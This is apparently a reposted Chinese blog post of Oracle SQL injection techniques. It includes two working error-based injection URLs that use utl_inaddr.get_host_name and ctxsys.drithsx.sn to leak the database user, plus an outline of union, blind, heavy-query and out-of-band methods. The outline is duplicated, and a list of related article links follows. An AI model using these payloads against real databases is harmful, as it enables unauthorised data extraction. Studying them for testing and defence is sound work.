Oracle 注入技巧收集
2016-05-30 20:50
666 查看
---恢复内容开始---
一、报错注入
(1)爆用户名(适用于:Oracle8,9和10g):
(2)基于报错注入(适用于Oracle 11g)取信息:
例如:
二、无报错信息
可通过以下几种方式来实现提取数据:
(1)联合查询;
(2)盲注;
(3)Heavy Queries
(4)Out Of Band Channels(带外通道)
---恢复内容结束---
一、报错注入
(1)爆用户名(适用于:Oracle8,9和10g):
http://192.168.2.10/ora2.php?name=1' and 1=utl_inaddr.get_host_name((select user from dual))--
(2)基于报错注入(适用于Oracle 11g)取信息:
ctxsys.drithsx.sn(1,(SQL语句))
例如:
http://192.168.2.10/ora1.php?name=' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--
二、无报错信息
可通过以下几种方式来实现提取数据:
(1)联合查询;
(2)盲注;
(3)Heavy Queries
(4)Out Of Band Channels(带外通道)
---恢复内容结束---
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- MySQL与Oracle的区别 之 事务的commit与rollback
- oracle-5-的升级步骤
- oracle 性能优化建议小结
- Oracle安装(11g)静默安装
- Oracle sqlplus设置显示格式命令详解
- Oracle去掉重复数据
- ORG-12514:TNS:监听进程不能解析在连接描述符中给出的SERVICE_NAME解决方案
- oracle不等于号取不到null值
- Oracle数据库基础
- Oracle基础学习笔记(二)
- Oracle安全警示录:加错裸设备导致redo异常
- Oracle安全警示录:加错裸设备导致redo异常
- Oracle迁移到DB2常用转换
- Oracle存储过程简单实例:
- Oracle安装时先决条件物理内存检查失败的解决方案
- ORACLE 存储过程被锁,编译不了,怎么解锁
- Oracle定时任务详解
- Oracle 定时任务详解
- oracle sql日期比较:
- oracle12c 新特性 缓存数据库